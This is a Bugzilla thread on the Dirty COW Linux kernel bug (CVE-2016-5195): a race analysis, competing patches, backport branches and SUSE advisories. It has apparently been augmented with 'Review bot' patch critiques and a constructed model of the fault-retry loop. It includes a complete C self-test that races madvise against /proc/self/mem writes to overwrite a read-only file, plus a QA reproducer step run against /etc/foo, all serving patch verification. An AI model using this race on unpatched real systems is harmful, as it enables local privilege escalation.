Bugzilla – Bug 1004418
VUL-0: CVE-2016-5195: kernel: local privilege escalation using MAP_PRIVATE "Dirty COW"
Last modified: 2021-08-25 09:49:44 UTC
via distros

From: Andy Lutomirski <luto@amacapital.net>

Hi all-

CVE-2016-5195 is a Linux privilege escalation bug. It probably affects all architectures and many versions. It is being actively exploited in the wild.

The attached test case is something I wrote in 15 minutes this evening. It's bed time and I haven't tried to weaponize it, so I'm not 100% sure it works.

There's a patch in testing. I don't know yet whether there will be an embargo. In the mean time, please don't share the test case.

Credit for this exploit should not go to me. If anyone wants to step forward and claim credit, they're welcome to do so.

--Andy
Is there any additional information on the sec mailing list?
no, that was all so far.
So the patch has not been shared yet?
no, not yet.
I am trying to wrap my head around this but have to admit a failure so far.

get_user_pages_remote triggered when we are writing to /proc/<pid>/mem will imply FOLL_FORCE which means that check_vma_flags will not fail with EFAULT as one would expect because the VMA backing the private mapping is not opened for write. So we continue to follow_page_mask which does the page table walk. We will get two possible results:
- page is mapped and pte read only pointing to the pagecache page if the main thread hasn't done madvise MADV_DONTNEED yet and still continues the read fault
- page is not present - aka madvise was faster

In both cases follow_page_pte should return with NULL - the not present case is trivial - the CoW case will rely on follow_page_pte doing

    if ((flags & FOLL_WRITE) && !pte_write(pte)) {
        pte_unmap_unlock(ptep, ptl);
        return NULL;
    }

and we should go to the page fault path - faultin_page(). handle_pte_fault would handle CoW in the first case and do_fault() should make sure to do the CoW on a write access in the latter case. In any case we should get a private page. Something went south apparently as we in fact manage to write to the pagecache page somehow. Maybe the read fault hasn't marked the pte properly. I will continue staring at the code...
bugbot adjusting priority
CRD: 2016-10-20 23:59
was also received via distros
Boris or Michal, please commit it to cve/linux-3.12 on top of tag rpm-3.12.60-52.54. That way, we can merge it easily for SLE12-LTSS and SLE12-SP1 fast-path. For SLE12-SP2, just use the tip of the branch.
OK, I finally understand what is going on here. I was just too focused on the page fault path which is apparently OK. It is g-u-p which gets confused:

faultin_page
  handle_mm_fault
    __handle_mm_fault
      handle_pte_fault
        do_fault <- pte is not present
          do_cow_fault <- FAULT_FLAG_WRITE
            alloc_set_pte
              maybe_mkwrite(pte_mkdirty(entry), vma) <- mark the page dirty but keep it RO
# Returns with 0 and retry
follow_page_mask
  follow_page_pte
    (flags & FOLL_WRITE) && !pte_write(pte) <- retry fault
faultin_page
  handle_mm_fault
    __handle_mm_fault
      handle_pte_fault
        FAULT_FLAG_WRITE && !pte_write
          do_wp_page
            PageAnon() <- this is CoWed page already
              reuse_swap_page <- page is exclusively ours
                wp_page_reuse
                  maybe_mkwrite <- dirty but RO again
                  ret = VM_FAULT_WRITE
  ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE)) <- we drop FOLL_WRITE
# Returns with 0 and retry as a read fault
cond_resched -> different thread will now unmap via madvise
follow_page_mask
  !pte_present && pte_none
faultin_page
  handle_mm_fault
    __handle_mm_fault
      handle_pte_fault
        do_fault <- pte is not present
          do_read_fault <- this is a read fault and we will get pagecache page!

The patch works because the pte will be always dirty for CoWed page while it is clean for the shared page pte (aka not write fault).
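To make the retry sequence in the comment above concrete, here is a constructed user-space model, added for this page (it is neither kernel code nor any participant's patch), of the three pieces involved: follow_page_pte(), faultin_page() and the __get_user_pages() retry loop, for a single pte of a MAP_PRIVATE, PROT_READ file mapping looked up with FOLL_WRITE | FOLL_FORCE, which is what a /proc/self/mem write does. The `fixed` switch selects between the 4.8.2 behaviour (drop FOLL_WRITE after VM_FAULT_WRITE) and the behaviour of commit 19be0eaffa3a (set FOLL_COW and let can_follow_write_pte() accept a dirty pte); `zap_after_iter` models the retry after which the racing madvise(MADV_DONTNEED) lands. The struct names, the iteration counter and the 8-retry cap are this model's simplifications.

```c
#include <stdbool.h>
#include <stdio.h>

/* gup flags and the fault return bit, named after the kernel's (model only) */
enum { FOLL_WRITE = 1u << 0, FOLL_FORCE = 1u << 1, FOLL_COW = 1u << 2 };
enum { VM_FAULT_WRITE = 1 };

enum page_kind { PAGE_NONE = 0, PAGE_ANON, PAGE_CACHE };

/* software PTE for the one page of a MAP_PRIVATE, PROT_READ file mapping */
struct pte { bool present, write, dirty, anon; };

/* the VMA: a private file mapping without VM_WRITE */
struct vma { bool vm_write; };

/* follow_page_pte(): vulnerable = plain pte_write() test, fixed = can_follow_write_pte() */
static enum page_kind follow_page_pte(const struct pte *pte, unsigned flags, bool fixed)
{
    if (!pte->present)
        return PAGE_NONE;                    /* no_page: caller must fault it in */
    if (flags & FOLL_WRITE) {
        bool can_write = pte->write;
        if (!can_write && fixed)
            /* a dirty pte reached through a forced CoW fault is our private copy */
            can_write = (flags & FOLL_FORCE) && (flags & FOLL_COW) && pte->dirty;
        if (!can_write)
            return PAGE_NONE;                /* retry via faultin_page() */
    }
    return pte->anon ? PAGE_ANON : PAGE_CACHE;
}

/* faultin_page(): the handle_mm_fault() outcome plus the post-fault flag handling */
static void faultin_page(struct pte *pte, const struct vma *vma, unsigned *flags, bool fixed)
{
    int ret = 0;

    if (!pte->present) {
        if (*flags & FOLL_WRITE)
            /* do_cow_fault(): private anon copy, pte_mkdirty(); maybe_mkwrite() keeps it RO */
            *pte = (struct pte){ .present = true, .write = vma->vm_write, .dirty = true, .anon = true };
        else
            /* do_read_fault(): map the shared page-cache page, clean and read-only */
            *pte = (struct pte){ .present = true, .write = false, .dirty = false, .anon = false };
        return;                              /* handle_mm_fault() returned 0: caller retries */
    }

    if ((*flags & FOLL_WRITE) && !pte->write) {
        /* do_wp_page(): exclusive anon page -> wp_page_reuse(), else copy; dirty, still RO */
        pte->anon = true;
        pte->dirty = true;
        pte->write = vma->vm_write;
        ret = VM_FAULT_WRITE;
    }

    if ((ret & VM_FAULT_WRITE) && !vma->vm_write) {
        if (fixed)
            *flags |= FOLL_COW;              /* fix: remember that CoW already happened */
        else
            *flags &= ~FOLL_WRITE;           /* bug: the next retry is a plain read fault */
    }
}

/* madvise(MADV_DONTNEED) from the racing thread: the pte becomes pte_none */
static void zap_pte(struct pte *pte)
{
    *pte = (struct pte){ 0 };
}

/*
 * __get_user_pages() for one page as used by a /proc/self/mem write
 * (FOLL_WRITE | FOLL_FORCE). zap_after_iter says after which retry the
 * racing madvise lands (0 = never). Returns the page the write lands on.
 */
enum page_kind gup_write(bool fixed, int zap_after_iter)
{
    struct vma vma = { .vm_write = false };
    struct pte pte = { 0 };
    unsigned flags = FOLL_WRITE | FOLL_FORCE;

    for (int iter = 1; iter <= 8; iter++) {
        enum page_kind page = follow_page_pte(&pte, flags, fixed);
        if (page != PAGE_NONE)
            return page;
        faultin_page(&pte, &vma, &flags, fixed);
        if (iter == zap_after_iter)
            zap_pte(&pte);                   /* cond_resched(): the other thread runs */
    }
    return PAGE_NONE;
}

int main(void)
{
    static const char *names[] = { "nothing", "private (anon) page", "page-cache page" };
    printf("vulnerable, madvise after do_wp_page: write hits %s\n", names[gup_write(false, 2)]);
    printf("fixed,      madvise after do_wp_page: write hits %s\n", names[gup_write(true, 2)]);
    printf("vulnerable, madvise after do_cow_fault: write hits %s\n", names[gup_write(false, 1)]);
    return 0;
}
```

Only a zap that lands after the do_wp_page retry (iteration 2 here) reaches the page-cache page, which is why the real reproducer loops madvise and the write until the timing happens to line up; a zap one retry earlier just costs another CoW fault.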
(In reply to Michal Marek from comment #13)
> Boris or Michal, please commit it to cve/linux-3.12 on top of tag
> rpm-3.12.60-52.54. That way, we can merge it easily for SLE12-LTSS and
> SLE12-SP1 fast-path.
>
> For SLE12-SP2, just use the tip of the branch.

I will take care of this. I just have to double check the s390 and dirty bit part. I am also thinking whether there is a simpler solution.
For cve/linux-3.0, use commit 574c4a7ce1d3 ("aacraid: Check size values after double-fetch from user (CVE-2016-6480 bsc#991608).") (git log origin/cve/linux-3.0 --not origin/scripts $(git describe --abbrev=0 origin/SLE11-SP4 origin/SLE11-SP3-LTSS origin/SLE11-SP2-LTSS) | tail; find the parent of the last commit shown).
And just for the reference. I believe it is abf09bed3cce ("s390/mm: implement software dirty bits") which is necessary for s390 to handle pte_dirty properly and unfortunately this is 3.9. So we cannot rely on pte_dirty on anything older AFAIU. I have an alternative fix which I have posted to Linus privately. If I got it right we should be OK without pte_dirty as well, but I am currently not sure that I made all the details right. The fix looks as follows. The primary idea is that if we want FOLL_WRITE && FOLL_FORCE on read only mapping then we must see anonymous (aka post CoW page). So checking for PageAnon should be OK AFAICS. This passes the test but as I've said, I might have missed some subtle details. --- diff --git a/mm/gup.c b/mm/gup.c index 96b2b2fd0fbd..ff198c5424c1 100644 --- a/mm/gup.c +++ b/mm/gup.c @@ -95,10 +95,6 @@ static struct page *follow_page_pte(struct vm_area_struct *vma, } if ((flags & FOLL_NUMA) && pte_protnone(pte)) goto no_page; - if ((flags & FOLL_WRITE) && !pte_write(pte)) { - pte_unmap_unlock(ptep, ptl); - return NULL; - } page = vm_normal_page(vma, address, pte); if (!page && pte_devmap(pte) && (flags & FOLL_GET)) { @@ -129,6 +125,14 @@ static struct page *follow_page_pte(struct vm_area_struct *vma, } } + /* + * Make sure we will never return a shared page and we + * must have passed through CoW + */ + if ((flags & FOLL_FORCE) && (flags & FOLL_WRITE) && !(vma->vm_flags & VM_WRITE)) + if (!PageAnon(page)) + goto no_page; + if (flags & FOLL_SPLIT && PageTransCompound(page)) { int ret; get_page(page); 
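Review bot: removing the `if ((flags & FOLL_WRITE) && !pte_write(pte))` early return is wider than the condition that replaces it. The added PageAnon test only fires when FOLL_FORCE is set and the VMA lacks VM_WRITE, so a FOLL_WRITE lookup of a read-only pte in a writable private mapping (a page that has not been CoWed yet) now returns the shared page instead of going through faultin_page(). Keep the pte_write check and relax it only for the forced write to a read-only VMA. PageAnon on its own also does not show the page is exclusively ours (an anonymous page can still be shared with a child after fork), so the test should additionally require page_mapcount(page) == 1, which is what the reuse_swap_page step in comment 14 establishes.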
@@ -402,17 +406,6 @@ static int faultin_page(struct task_struct *tsk, struct vm_area_struct *vma, return -EBUSY; } - /* - * The VM_FAULT_WRITE bit tells us that do_wp_page has broken COW when - * necessary, even if maybe_mkwrite decided not to set pte_write. We - * can thus safely do subsequent page lookups as if they were reads. - * But only do so when looping for pte_write is futile: in some cases - * userspace may also be wanting to write to the gotten user page, - * which a read fault here might prevent (a readonly page might get - * reCOWed by userspace write). - */ - if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE)) - *flags &= ~FOLL_WRITE; return 0; }
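Review bot: dropping `*flags &= ~FOLL_WRITE` is the part that closes the window traced in comment 14, but with FOLL_WRITE kept, follow_page_pte() must accept the still read-only pte that wp_page_reuse() leaves behind; the first hunk only does so when the page is PageAnon, so the two hunks depend on each other. Applying this hunk alone turns the race into an endless follow_page_pte()/faultin_page() loop, and applying the first alone leaves the race. Replace the removed comment with one stating the new invariant (a forced write to a read-only VMA returns only a CoWed anonymous page) so backporters keep the hunks together.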
(In reply to Michal Hocko from comment #18) [...] > diff --git a/mm/gup.c b/mm/gup.c > index 96b2b2fd0fbd..ff198c5424c1 100644 > --- a/mm/gup.c > +++ b/mm/gup.c > @@ -95,10 +95,6 @@ static struct page *follow_page_pte(struct vm_area_struct > *vma, > } > if ((flags & FOLL_NUMA) && pte_protnone(pte)) > goto no_page; > - if ((flags & FOLL_WRITE) && !pte_write(pte)) { > - pte_unmap_unlock(ptep, ptl); > - return NULL; > - } This is not correct. I really have to preserve the pte_write check. So it seems like we will end up with the Linus patch and only do the following for pre 3.9 kernels differently. But let me think about that some more. @@ -60,6 +60,24 @@ static int follow_pfn_pte(struct vm_area_struct *vma, unsigned long address, return -EEXIST; } +static inline bool exclusive_anon_page(struct page *page) +{ + return PageAnon(page) && page_mapcount(page) == 1; +} + +static inline bool can_follow_write_pte(pte_t pte, struct page *page, + unsigned int flags) +{ + if (pte_write(pte)) + return true; + + /* Make sure that we are really following CoWed page */ + if ((flags & FOLL_FORCE) && (flags & FOLL_COW)) + return page && exclusive_anon_page(page); + + return false; +} + static struct page *follow_page_pte(struct vm_area_struct *vma, unsigned long address, pmd_t *pmd, unsigned int flags) { @@ -95,12 +113,11 @@ static struct page *follow_page_pte(struct vm_area_struct *vma, } if ((flags & FOLL_NUMA) && pte_protnone(pte)) goto no_page; - if ((flags & FOLL_WRITE) && !pte_write(pte)) { - pte_unmap_unlock(ptep, ptl); - return NULL; - } page = vm_normal_page(vma, address, pte); + if ((flags & FOLL_WRITE) && !can_follow_write_pte(pte, page, flags)) + goto no_page; + if (!page && pte_devmap(pte) && (flags & FOLL_GET)) { /* * Only return device mapping pages in the FOLL_GET case since
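Review bot: can_follow_write_pte() keys on FOLL_COW, but neither a definition of FOLL_COW nor the place that sets it appears in these hunks. faultin_page() needs to set FOLL_COW where it used to clear FOLL_WRITE on `(ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE)`, otherwise the `(flags & FOLL_FORCE) && (flags & FOLL_COW)` branch never fires and a forced write to a read-only private mapping keeps bouncing between follow_page_pte() and faultin_page(). Also state in the commit message why `page_mapcount(page) == 1` in exclusive_anon_page() is sufficient here, given that do_wp_page() relies on reuse_swap_page() for the same "exclusively ours" decision (comment 14).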
While we were discussing over the weekend it turned out (thanks to Hugh) that we are not affected prior to 2.6.22 because madvise used the exclusive mmap_sem before 0a27a14a6292 ("mm: madvise avoid exclusive mmap_sem"). So cve/linux-2.6.16 is not affected. Newer kernels are, sadly. We have still not settled on whether to go with Linus' pte_dirty fix or mine based on PageAnon. Anyway both should be OK and if upstream decides to go with Linus' one I will use PageAnon for our pre 3.9 kernels because pte_dirty wouldn't work for s390.
Created attachment 697591 [details]
PageAnon based patch

This patch should be easier to backport to older kernels as it doesn't depend on the pte_dirty check which was a problem on pre 3.9 s390 kernels.
Created attachment 697810 [details]
Linus fix

This will most probably end up in the Linus tree and I will push it for everything 3.9+ we have.
Do you have an ETA for the submits?
(In reply to Johannes Segitz from comment #23)
> Do you have an ETA for the submits?

I will have patches ready by this noon.
Fixes are in
users/mhocko/SLE12-SP2/bnc1004418_EMBARGO
users/mhocko/cve/linux-3.12/bnc1004418_EMBARGO - SLE12-LTSS and SLE12-SP1 can pull

All of them should be merge-able to the last released kernel, therefore appropriate for a fast track update with a single fix. Others will follow.
users/mhocko/cve/linux-3.0/bnc1004418_EMBARGO - SLE11-SP3-TD, SLE11-SP[23]-LTSS and SLE11-SP4 can pull
users/mhocko/cve/linux-2.6.32/bnc1004418_EMBARGO - SLE11-SP1-TD can pull
Yes. And 42.2 will get it via SLE12-SP2. The question is, whether to do fast path or regular update for openSUSE.
for opensuse we can do a regular update as the QA turnaround is quicker.
Are we able to submit an embargoed fix for openSUSE? Via IBS perhaps?
No. There is the potential of having read-protected OBS projects, but then you can not do requests from them. For openSUSE I would suggest submitting directly after embargo end. (sadly, aarch64 will waste a lot of time during building the update again, delaying it ... but well.)
(In reply to Marcus Meissner from comment #29)
> for opensuse we can do a regular update as the QA turnaround is quicker.

OK, I have pushed the fix to
users/mhocko/openSUSE-42.1/bnc1004418_EMBARGO
users/mhocko/openSUSE-13.2/bnc1004418_EMBARGO

They are both based on the last maint. update just in case. 42.2 can pull from the SLE12-SP2 embargo branch. So we should be done here.
(In reply to Michal Hocko from comment #25)
> Fixes are in
> users/mhocko/SLE12-SP2/bnc1004418_EMBARGO
> users/mhocko/cve/linux-3.12/bnc1004418_EMBARGO

The patches in these branches seem to have the wrong subject line (without colon). Could you fix them? Nowadays scripts/log catches it and complains :)
(In reply to Michal Hocko from comment #25)
> users/mhocko/cve/linux-3.12/bnc1004418_EMBARGO - SLE12-LTSS and SLE12-SP1
> can pull

Please commit on top of rpm-3.12.60-52.54.
(In reply to Takashi Iwai from comment #33)
> The patches in these branches seem to have the wrong subject line (without
> colon). Could you fix them? Nowadays scripts/log catches and complains it
> :)

Fixed.

(In reply to Michal Marek from comment #34)
> Please commit on top of rpm-3.12.60-52.54.

Oops, I've screwed up the base for the commit. Rebased on top of this tag. Sorry about that.
the patch is public

commit 19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619
Author: Linus Torvalds <torvalds@linux-foundation.org>
Date:   Thu Oct 13 13:07:36 2016 -0700

    mm: remove gup_flags FOLL_WRITE games from __get_user_pages()
No OSS posting, but public via other distros and git.
FWIW landed in 3.12.66, 4.8.3, 4.7.9 and 4.4.26.
This is an autogenerated message for OBS integration:
This bug (1004418) was mentioned in
https://build.opensuse.org/request/show/436495 42.1 / kernel-source
https://build.opensuse.org/request/show/436499 42.2 / kernel-source
https://build.opensuse.org/request/show/436500 42.2 / kernel-source
This is an autogenerated message for OBS integration:
This bug (1004418) was mentioned in
https://build.opensuse.org/request/show/436513 13.1 / kernel-source
From Solar Designer on oss-sec

Hi,

This was brought to the linux-distros list (and briefly inadvertently to the distros list, although discussion continued on linux-distros only) on October 13 and it was made public yesterday, so it must be in here as well. Unfortunately, no one posted about it in here so far (the person who brought this to [linux-]distros must have done so!), and I don't have time to make a proper posting (with full detail in the message itself, as per oss-security list content guidelines), but I figured it's better for me to post something than nothing at all.

Red Hat's description:

"A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system."

https://access.redhat.com/security/cve/cve-2016-5195
https://bugzilla.redhat.com/show_bug.cgi?id=1384344
https://security-tracker.debian.org/tracker/CVE-2016-5195
http://www.v3.co.uk/v3-uk/news/2474845/linux-users-urged-to-protect-against-dirty-cow-security-flaw
https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619
https://lkml.org/lkml/2016/10/19/860
https://dirtycow.ninja
https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
https://twitter.com/DirtyCOWVuln

Alexander
Codename, website, reproducer and logo ... http://dirtycow.ninja/
Created attachment 698546 [details]
dirtyc0w.c

QA REPRODUCER:

gcc -pthread -o dirtyc0w dirtyc0w.c -O2 -Wall

as root: create a file /etc/foo with content "test"

as user:
cat /etc/foo
./dirtyc0w /etc/foo "exploited"
cat /etc/foo

if /etc/foo is "exploited" afterwards, the reproducer worked.
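A self-contained variant of the QA check above, added here as an example (it is not the dirtyc0w.c attachment): instead of a root-owned /etc/foo it creates a temporary file the caller owns with constructed content, maps it MAP_PRIVATE and PROT_READ, races madvise(MADV_DONTNEED) against writes through /proc/self/mem (the get_user_pages path with FOLL_FORCE that comment 9 describes), and then reads the file back through the page cache rather than through the mapping, so a private copy cannot fool the check. The file name, payload, iteration count and the use of /tmp are this example's own choices. A kernel carrying 19be0eaffa3a leaves the file unchanged and the function returns 0; on an unfixed kernel the forced write lands in the page cache and it returns 1.

```c
#define _GNU_SOURCE
#define _FILE_OFFSET_BITS 64
#include <fcntl.h>
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* constructed file content; longer than PAYLOAD so the read-back is unambiguous */
#define ORIGINAL "this is the original file content\n"
#define PAYLOAD  "exploited"

struct race {
    void *map;          /* MAP_PRIVATE, PROT_READ mapping of the test file */
    size_t len;
    int mem_fd;         /* /proc/self/mem */
    long iterations;
};

/* thread 1: keep discarding the private copy so the next fault on the page starts over */
static void *madvise_thread(void *arg)
{
    struct race *r = arg;
    for (long i = 0; i < r->iterations; i++)
        madvise(r->map, r->len, MADV_DONTNEED);
    return NULL;
}

/* thread 2: write into the read-only mapping via /proc/self/mem (gup with FOLL_FORCE) */
static void *procmem_thread(void *arg)
{
    struct race *r = arg;
    for (long i = 0; i < r->iterations; i++)
        pwrite(r->mem_fd, PAYLOAD, strlen(PAYLOAD), (off_t)(uintptr_t)r->map);
    return NULL;
}

/*
 * Returns 1 if the forced write reached the page cache (kernel vulnerable),
 * 0 if the file is unchanged (fixed kernel), -1 if the test could not be set up.
 */
int dirtycow_self_test(long iterations)
{
    char path[] = "/tmp/dirtycow-selftest-XXXXXX";
    struct race r = { .len = sizeof ORIGINAL - 1, .iterations = iterations };
    int rc = -1;

    int fd = mkstemp(path);
    if (fd < 0)
        return -1;
    if (write(fd, ORIGINAL, r.len) != (ssize_t)r.len)
        goto out_unlink;
    close(fd);

    /* reopen read-only, as an unprivileged user would open a root-owned file */
    fd = open(path, O_RDONLY);
    if (fd < 0)
        goto out_unlink;
    r.map = mmap(NULL, r.len, PROT_READ, MAP_PRIVATE, fd, 0);
    if (r.map == MAP_FAILED)
        goto out_close;
    r.mem_fd = open("/proc/self/mem", O_RDWR);
    if (r.mem_fd < 0)
        goto out_unmap;

    pthread_t t1, t2;
    if (pthread_create(&t1, NULL, madvise_thread, &r) != 0)
        goto out_mem;
    if (pthread_create(&t2, NULL, procmem_thread, &r) != 0) {
        pthread_join(t1, NULL);
        goto out_mem;
    }
    pthread_join(t1, NULL);
    pthread_join(t2, NULL);

    /* read back through the page cache, not through the (possibly CoWed) mapping */
    char buf[64] = { 0 };
    ssize_t n = pread(fd, buf, sizeof buf - 1, 0);
    if (n >= (ssize_t)strlen(PAYLOAD))
        rc = memcmp(buf, PAYLOAD, strlen(PAYLOAD)) == 0 ? 1 : 0;

out_mem:
    close(r.mem_fd);
out_unmap:
    munmap(r.map, r.len);
out_close:
    close(fd);
out_unlink:
    unlink(path);
    return rc;
}

int main(void)
{
    int rc = dirtycow_self_test(200000);
    if (rc < 0) {
        perror("dirtycow_self_test");
        return 2;
    }
    puts(rc ? "VULNERABLE: write through /proc/self/mem reached the page cache"
            : "not vulnerable: file unchanged");
    return rc;
}
```

Build with `gcc -pthread -O2 -Wall`, as for the attachment. Because the outcome depends on a race, a 0 after one run is evidence, not proof, that the kernel is fixed; running with a larger iteration count or repeating the test a few times narrows the gap.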
This is an autogenerated message for OBS integration:
This bug (1004418) was mentioned in
https://build.opensuse.org/request/show/436657 Evergreen:11.4 / kernel-debug+kernel-default+kernel-desktop+kernel-docs+kernel-ec2+kernel-pae+kernel-source+kernel-syms+kernel-trace+kernel-vanilla+kernel-vmi+kernel-xen+preload
openSUSE-SU-2016:2583-1: An update that solves four vulnerabilities and has 21 fixes is now available.

Category: security (important)
Bug References: 1000287,1000304,1000907,1001462,1001486,1004418,1004462,1005101,799133,881008,909994,911687,922634,963655,972460,978094,979681,987703,991247,991665,993890,993891,996664,999600,999932
CVE References: CVE-2016-5195,CVE-2016-7039,CVE-2016-7425,CVE-2016-8658
Sources used:
openSUSE Leap 42.1 (src): drbd-8.4.6-10.1, hdjmod-1.28-26.1, ipset-6.25.1-7.1, kernel-debug-4.1.34-33.1, kernel-default-4.1.34-33.1, kernel-docs-4.1.34-33.3, kernel-ec2-4.1.34-33.1, kernel-obs-build-4.1.34-33.1, kernel-obs-qa-4.1.34-33.1, kernel-obs-qa-xen-4.1.34-33.1, kernel-pae-4.1.34-33.1, kernel-pv-4.1.34-33.1, kernel-source-4.1.34-33.1, kernel-syms-4.1.34-33.1, kernel-vanilla-4.1.34-33.1, kernel-xen-4.1.34-33.1, lttng-modules-2.7.0-4.1, pcfclock-0.44-268.1, vhba-kmp-20140928-7.1
openSUSE-SU-2016:2584-1: An update that solves two vulnerabilities and has two fixes is now available.

Category: security (important)
Bug References: 1001419,1001486,1002165,1004418
CVE References: CVE-2016-5195,CVE-2016-8666
Sources used:
openSUSE 13.1 (src): cloop-2.639-11.34.1, crash-7.0.2-2.34.1, hdjmod-1.28-16.34.1, ipset-6.21.1-2.38.1, iscsitarget-1.4.20.3-13.34.1, kernel-debug-3.12.62-55.1, kernel-default-3.12.62-55.1, kernel-desktop-3.12.62-55.1, kernel-docs-3.12.62-55.2, kernel-ec2-3.12.62-55.1, kernel-pae-3.12.62-55.1, kernel-source-3.12.62-55.1, kernel-syms-3.12.62-55.1, kernel-trace-3.12.62-55.1, kernel-vanilla-3.12.62-55.1, kernel-xen-3.12.62-55.1, ndiswrapper-1.58-35.1, openvswitch-1.11.0-0.41.1, pcfclock-0.44-258.35.1, vhba-kmp-20130607-2.34.1, virtualbox-4.2.36-2.66.1, xen-4.3.4_10-67.1, xtables-addons-2.3-2.33.1
SUSE-SU-2016:2585-1: An update that fixes one vulnerability is now available.

Category: security (important)
Bug References: 1004418
CVE References: CVE-2016-5195
Sources used:
SUSE Linux Enterprise Software Development Kit 11-SP4 (src): kernel-docs-3.0.101-84.2
SUSE Linux Enterprise Server 11-SP4 (src): kernel-default-3.0.101-84.1, kernel-ec2-3.0.101-84.1, kernel-pae-3.0.101-84.1, kernel-ppc64-3.0.101-84.1, kernel-source-3.0.101-84.1, kernel-syms-3.0.101-84.1, kernel-trace-3.0.101-84.1, kernel-xen-3.0.101-84.1
SUSE Linux Enterprise Server 11-EXTRA (src): kernel-default-3.0.101-84.1, kernel-pae-3.0.101-84.1, kernel-ppc64-3.0.101-84.1, kernel-trace-3.0.101-84.1, kernel-xen-3.0.101-84.1
SUSE Linux Enterprise Debuginfo 11-SP4 (src): kernel-default-3.0.101-84.1, kernel-ec2-3.0.101-84.1, kernel-pae-3.0.101-84.1, kernel-ppc64-3.0.101-84.1, kernel-trace-3.0.101-84.1, kernel-xen-3.0.101-84.1
SUSE-SU-2016:2592-1: An update that solves one vulnerability and has 7 fixes is now available.

Category: security (important)
Bug References: 1001419,1002165,1004418,904970,907150,920615,920633,930408
CVE References: CVE-2016-5195
Sources used:
SUSE Linux Enterprise Workstation Extension 12-SP1 (src): kernel-default-3.12.62-60.64.8.2
SUSE Linux Enterprise Software Development Kit 12-SP1 (src): kernel-docs-3.12.62-60.64.8.5, kernel-obs-build-3.12.62-60.64.8.3
SUSE Linux Enterprise Server 12-SP1 (src): kernel-default-3.12.62-60.64.8.2, kernel-source-3.12.62-60.64.8.2, kernel-syms-3.12.62-60.64.8.2, kernel-xen-3.12.62-60.64.8.2
SUSE Linux Enterprise Module for Public Cloud 12 (src): kernel-ec2-3.12.62-60.64.8.2
SUSE Linux Enterprise Live Patching 12 (src): kgraft-patch-SLE12-SP1_Update_8-1-2.2
SUSE Linux Enterprise Desktop 12-SP1 (src): kernel-default-3.12.62-60.64.8.2, kernel-source-3.12.62-60.64.8.2, kernel-syms-3.12.62-60.64.8.2, kernel-xen-3.12.62-60.64.8.2
SUSE-SU-2016:2593-1: An update that solves one vulnerability and has 7 fixes is now available.

Category: security (important)
Bug References: 1001419,1002165,1004418,904970,907150,920615,920633,930408
CVE References: CVE-2016-5195
Sources used:
SUSE Linux Enterprise Server for SAP 12 (src): kernel-default-3.12.60-52.57.1, kernel-source-3.12.60-52.57.1, kernel-syms-3.12.60-52.57.1, kernel-xen-3.12.60-52.57.1, kgraft-patch-SLE12_Update_16-1-2.1
SUSE Linux Enterprise Server 12-LTSS (src): kernel-default-3.12.60-52.57.1, kernel-source-3.12.60-52.57.1, kernel-syms-3.12.60-52.57.1, kernel-xen-3.12.60-52.57.1, kgraft-patch-SLE12_Update_16-1-2.1
SUSE Linux Enterprise Module for Public Cloud 12 (src): kernel-ec2-3.12.60-52.57.1
Is there any possibility for this to be exploited remotely?
SUSE-SU-2016:2596-1: An update that fixes one vulnerability is now available.

Category: security (important)
Bug References: 1004418
CVE References: CVE-2016-5195
Sources used:
SUSE Linux Enterprise Server 11-SP2-LTSS (src): kernel-default-3.0.101-0.7.44.1, kernel-ec2-3.0.101-0.7.44.1, kernel-pae-3.0.101-0.7.44.1, kernel-source-3.0.101-0.7.44.1, kernel-syms-3.0.101-0.7.44.1, kernel-trace-3.0.101-0.7.44.1, kernel-xen-3.0.101-0.7.44.1
SUSE Linux Enterprise Debuginfo 11-SP2 (src): kernel-default-3.0.101-0.7.44.1, kernel-ec2-3.0.101-0.7.44.1, kernel-pae-3.0.101-0.7.44.1, kernel-trace-3.0.101-0.7.44.1, kernel-xen-3.0.101-0.7.44.1
(In reply to Robert Snow from comment #86)
> Is ther any possibility for this to be exploited remotely?

It really depends on what you mean by that. If you are able to run code as a local user by exploiting a vulnerability in a remotely accessible service then yes, unless you are in such a restricted environment that it prohibits access to all the parts of the exploit (in other words, whoever can call madvise and is allowed to open sensitive files and /proc/self/maps will be affected).
Just wondering if there's a timeline for SLES11 SP1 and SP3 LTSS packages? I've built my own in both cases using the patch that was used in the SP4 fix. The patch needed a little massaging for SP1 but in both cases the patched kernel appears resistant to the exploits online. My SP1 LTSS patch is here: https://www.dropbox.com/sh/jwlacynxok8ywoc/AAD1B2R4Wmdd1IR85NswIGERa/sles11_sp1_ltss.patch. If someone could take a look at the SP1 patch, that would be great! -Aaron
(In reply to Aaron Knister from comment #93)
> Just wondering if there's a timeline for SLES11 SP1 and SP3 LTSS packages?
> I've built my own in both cases using the patch that was used in the SP4
> fix. The patch needed a little massaging for SP1 but in both cases the
> patched kernel appears resistant to the exploits online. My SP1 LTSS patch
> is here:

SLES 11 SP1 LTSS does not get proactive updates anymore, its EOL was August 31 2015 (over 1 year ago). If you have an extended contract for it, contact your support agent.

SLES 11 SP3 LTSS update will be released Monday (today).
Someone just pointed out on IRC it seems we have patches for openSUSE Evergreen but not 13.2 which is still under active support.
The kernel team had not submitted 13.2. I fetched current git yesterday and it is currently building... hopefully it can be released later today.
As per comment#71, can we get a clear statement here? Is SLES 10 affected? If not, I would like to add a note to the TID to deflect questions in that area.
SUSE-SU-2016:2614-1: An update that fixes one vulnerability is now available.

Category: security (important)
Bug References: 1004418
CVE References: CVE-2016-5195
Sources used:
SUSE OpenStack Cloud 5 (src): kernel-bigsmp-3.0.101-0.47.90.1, kernel-default-3.0.101-0.47.90.1, kernel-ec2-3.0.101-0.47.90.1, kernel-source-3.0.101-0.47.90.1, kernel-syms-3.0.101-0.47.90.1, kernel-trace-3.0.101-0.47.90.1, kernel-xen-3.0.101-0.47.90.1
